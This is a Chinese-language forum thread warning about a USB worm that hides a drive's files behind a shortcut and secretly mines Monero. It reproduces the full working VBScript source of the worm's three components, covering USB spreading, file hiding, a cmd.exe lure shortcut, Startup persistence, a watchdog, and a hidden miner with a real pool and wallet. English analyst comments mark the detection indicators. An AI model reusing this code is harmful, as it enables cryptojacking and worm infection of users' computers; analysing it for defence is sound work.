隨身碟病毒

kc305chen

隨身碟病毒

文章kc305chen » 2016年 7月 1日, 00:22

最近似乎在流行某隻隨身碟病毒(蠕蟲?),被感染的隨身碟內容會變成一個捷徑,點了捷徑才會看到自己原本的檔案,殊不知在點下捷徑的同時,這隻病毒也在你的主機中種下程式~~
說到目前為止似乎和挖礦沒啥關聯,但是仔細研究了一下中毒後產生的vbscript檔,就會發現這隻病毒把你的電腦當成了礦機,在幫人家挖礦,所以提醒各位朋友,自己在挖礦的同時,千萬要小心別也幫別人挖了礦了~~
挖礦的程式碼~"-o stratum+tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1"

sephirothpan

Re: 隨身碟病毒

文章sephirothpan » 2016年 7月 2日, 01:11

主程式是?
MINER?
不太可能吧,
有一半的防毒軟體會擋住耶

kc305chen

Re: 隨身碟病毒

文章kc305chen » 2016年 7月 5日, 20:48

主程式沒留下來,當初沒想太多,就直接刪掉了~
至於防毒軟體,當初我們公司中的時候,防毒軟體沒有叫~
後來我更新了WINDOWS DEFENDER之後,想再打開就顯示有惡意程式碼~
可以上網搜尋一下helper.vbs,有蠻多人回報這隻病毒,但是好像大家都覺得它只是隻病毒,沒注意到裡頭的程式碼~
以下是在某FB社團搜尋到的,供各位參考一下~


' Analyst annotation: this appears to be "helper.vbs" (the name this script gives its own
' Startup shortcut below). Its role is to keep a cryptocurrency miner running and to relaunch
' the installer script. The comments describe observed behaviour for detection purposes.
' Suppresses every runtime error, so any failed step below is silent.
on error resume next
Dim ws, sParams, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner
Set ws = WScript.CreateObject("WScript.Shell")
' Miner arguments: "-o" names a stratum mining pool (host xmr.crypto-pool.fr, TCP port 3333);
' the "-u" value looks like a Monero wallet address (pool name contains "xmr" - TODO confirm).
' Network indicator for defenders: outbound TCP connections to that host on port 3333.
sParams = "-o stratum+tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1"

' WMI connection used below to enumerate running processes.
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

' Resolve the folder this script runs from; strPath ends up with a trailing backslash.
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
' Current user's Startup folder - the persistence location used inside the loop.
startupPath = ws.SpecialFolders("startup")

' Full miner command: quoted path to WindowsServices.exe in the script's folder plus the pool arguments.
' Host indicator: WindowsServices.exe located next to helper.vbs.
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34) & sParams

' Commented out in the sample; the miner is started inside the loop instead.
'ws.Run miner , 0

' Assigned but never read anywhere in this script.
MyScript = "helper.vbs"

' Watchdog loop: never exits.
While True
' Persistence: (re)create Startup\helper.lnk pointing at helper.vbs in this folder.
' Host indicator: a "helper.lnk" in the user's Startup folder whose target is helper.vbs.
If (not objws.fileexists(startupPath & "\helper.lnk")) then
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath = strPath & "helper.vbs"
link.WorkingDirectory = strPath
link.Save
End If

' Enumerate wscript.exe processes; procheck (defined below this block) relaunches installer.vbs
' when no wscript.exe command line mentions it.
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

call procheck(colProcess, "installer.vbs")

' Relaunch the miner whenever no process named like WindowsServices.exe is running.
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")

if colProcess.count = 0 then
' Window style 0 = hidden, so the miner shows no console to the user.
ws.Run miner, 0
end if
' Re-check every 5 seconds.
WScript.Sleep 5000
Wend

' Ensures a script named procname is running under wscript.exe: scans the command lines of the
' processes in checkme and, if none contains procname, launches strPath & procname (strPath is the
' script-folder path from the script-level scope).
' checkme  - WMI Win32_Process collection (already filtered to wscript.exe by the caller)
' procname - substring to look for in each command line; also the file name to start
sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

' Substring match only: any command line that mentions procname counts as "already running".
if instr(vaprocess, procname) then
Exit sub
End if

Next

' Not found among the running wscript.exe processes: start it from the script's folder.
ws.Run strPath & procname
end sub
======================分隔=====================
' Analyst annotation: this appears to be "installer.vbs" (the script helper.vbs relaunches; it in
' turn keeps helper.vbs alive below). It waits for removable drives to be attached and plants the
' four worm files on each one, hiding the drive's real contents behind a lure shortcut.
' The comments describe observed behaviour for detection purposes.
' Suppresses every runtime error, so any failed step below is silent.
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

' Assigned but not read in this script (DestFolder is built from a literal further down).
Target = "\WindowsServices"

'where are we?
' strFolder = folder this script runs from; source of the files copied onto each drive.
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)

'Checking for USB instance
' WMI event subscription, polled every second, for any change to a Win32_LogicalDisk instance.
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

' Infinite loop: never exits.
While True

' Keep helper.vbs (the miner watchdog) running; procheck is defined below this block.
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")

' Blocks until the next logical-disk event arrives.
Set objEvent = colEvents.NextEvent

' DriveType 2 = removable disk; only a newly created instance (drive just attached) is handled.
If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
' device = the drive's DeviceID (drive letter, e.g. "E:" - constructed example);
' devicename = the volume label, reused below as the name of the lure shortcut.
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
' Two hidden folders on the drive: "WindowsServices" holds the worm files, "_" receives the
' user's own files. Both are host indicators of an infected drive.
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
' Attribute bit 2 = Hidden.
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
end if
' Copy the four components into the hidden folder (moveandhide is defined below this block).
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")

' Lure shortcut at the drive root, named after the volume label.
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.Description = devicename
' Icon borrowed from SHELL32.dll, presumably so the shortcut resembles a drive - TODO confirm index.
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
' Target is cmd.exe (%COMSPEC%); opening the shortcut runs movemenoreg.vbs from the hidden folder.
' Detection point: cmd.exe launched with a ".\WindowsServices\movemenoreg.vbs" argument.
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
'link.WorkingDirectory = device
link.Save
End If


' Hidden "_" folder that will receive the drive's original files and folders.
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
End If
' Move everything at the drive root except the lure shortcut into "_" (checker is defined below).
set check = objws.getFolder(device)
Call checker(check)

End If
End If


Wend

' Hides the drive's real contents: moves every file at the drive root except the lure shortcut
' (devicename & ".lnk") into the hidden "_" folder (DummyFolder, set by the caller), then moves
' every subfolder except "_", "WindowsServices" and "System Volume Information" there as well.
' path - FileSystemObject Folder object for the drive root (devicename and DummyFolder come from
'        the script-level scope).
sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select

' Note: the loop variable below reuses "home", the collection being iterated; each iteration
' "home" is one Folder, compared (as a path string) against the excluded names.
Next

set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select

Next

end sub

'------------------------------------------------------------

' Copies the worm component "name" (a file name with a leading backslash) from strFolder into
' DestFolder when it is not already there, then sets the Hidden attribute (bit 2) on the copy.
' strFolder and DestFolder come from the script-level scope (DestFolder = the drive's
' hidden WindowsServices folder at the time of the call).
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

' "not" binds before "and" in VBScript, so this reads (Not Attributes) And 2, which is
' non-zero exactly when the Hidden bit is clear.
If not objmove.Attributes AND 2 then
objmove.Attributes = objmove.Attributes + 2
end if
end if
end sub

'------------------------------------------------------------

' Ensures a script named procname is running under wscript.exe: scans the command lines of the
' processes in checkme and, if none contains procname, launches it from strFolder (the folder
' this script runs from, taken from the script-level scope).
' checkme  - WMI Win32_Process collection (already filtered to wscript.exe by the caller)
' procname - substring to look for in each command line; also the file name to start
sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

' Substring match only: any command line that mentions procname counts as "already running".
if instr(vaprocess, procname) then
Exit sub
End if

Next
' Not found: start the script from this script's folder.
ws.Run strFolder & "\" & procname
end sub
===================分隔=======================
' Analyst annotation: this appears to be "movemenoreg.vbs", the script the lure shortcut on an
' infected drive launches through cmd.exe. It opens the hidden "_" folder (where the user's real
' files were moved) so the shortcut seems to work, then copies the four components into
' %AppData% and hands over to the miner watchdog. The comments describe observed behaviour for
' detection purposes.
' Suppresses every runtime error, so any failed step below is silent.
on error resume next
Dim strPath, objws, objFile, strFolder, Target, SourceFolder, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
Set ws = WScript.CreateObject("WScript.Shell")

' Sub-folder name under %AppData% used for the local copy.
Target = "\WindowsServices"

'where are we?
' strFolder = the drive's WindowsServices folder; pfolder = its parent, i.e. the drive root.
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
' Opens "<drive root>\_", the hidden folder holding the user's original files (presumably in
' Explorer - TODO confirm), so that clicking the shortcut appears to show the drive's contents.
ws.Run pfolder & "\_"

' Local install location: %AppData%\WindowsServices, created with the Hidden attribute (bit 2).
' Host indicator: a hidden "WindowsServices" folder directly under the user's AppData.
AppData = ws.ExpandEnvironmentStrings("%AppData%")

DestFolder = AppData & Target
' Assigned but not read in this script (moveandhide copies from strFolder directly).
SourceFolder = strFolder

if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
end if

' Copy the four components into %AppData%\WindowsServices. moveandhide is defined below this
' call; VBScript resolves Sub definitions before execution, so the forward call is valid.
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")

' Copies the worm component "name" (a file name with a leading backslash) from strFolder into
' DestFolder when it is not already there, then sets the Hidden attribute (bit 2) on the copy.
' strFolder (the drive's WindowsServices folder) and DestFolder (%AppData%\WindowsServices)
' come from the script-level scope.
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

' "not" binds before "and" in VBScript, so this reads (Not Attributes) And 2, which is
' non-zero exactly when the Hidden bit is clear.
If not objmove.Attributes AND 2 then
objmove.Attributes = objmove.Attributes + 2
end if
end if
end sub

' Final step: if any running wscript.exe already has "helper.vbs" on its command line, exit;
' otherwise start the freshly installed copy from %AppData%\WindowsServices.
' Detection point: wscript.exe whose command line ends in "\WindowsServices\helper.vbs".
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
' Substring match only.
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next

' Starts the miner watchdog (helper.vbs) from the local install folder.
ws.Run DestFolder & "\helper.vbs"

Set ws = Nothing

